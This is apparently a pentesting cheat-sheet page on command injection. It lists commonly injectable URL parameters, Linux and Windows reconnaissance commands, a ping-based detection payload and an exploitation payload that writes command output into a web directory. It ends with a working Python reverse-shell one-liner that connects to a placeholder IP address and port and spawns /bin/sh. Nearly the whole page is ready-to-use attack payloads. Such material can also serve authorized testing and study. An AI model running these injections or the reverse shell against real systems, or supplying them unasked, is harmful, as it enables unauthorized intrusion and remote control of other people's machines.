💉Command Injection

Parameters

?cmd={payload}
?exec={payload}
?command={payload}
?execute{payload}
?ping={payload}
?query={payload}
?jump={payload}
?code={payload}
?reg={payload}
?do={payload}
?func={payload}
?arg={payload}
?option={payload}
?load={payload}
?process={payload}
?step={payload}
?read={payload}
?function={payload}
?req={payload}
?feature={payload}
?exe={payload}
?module={payload}
?payload={payload}
?run={payload}
?print={payload}

Linux Commands

whoami
uname -a
ifconfig
netstat -an
ps -ef

Windows Commands

whoami
ver
ipconfig /all
netstat -an
tasklist

Command Injection Detection

& ping -c 10 127.0.0.1 &

Exploiting Command Injection

& whoami > /var/www/static/whoami.txt &

Python Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<IP-Address>",<Port>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Previouscross site scripting Nextfile upload vulnerability

Last updated 5 months ago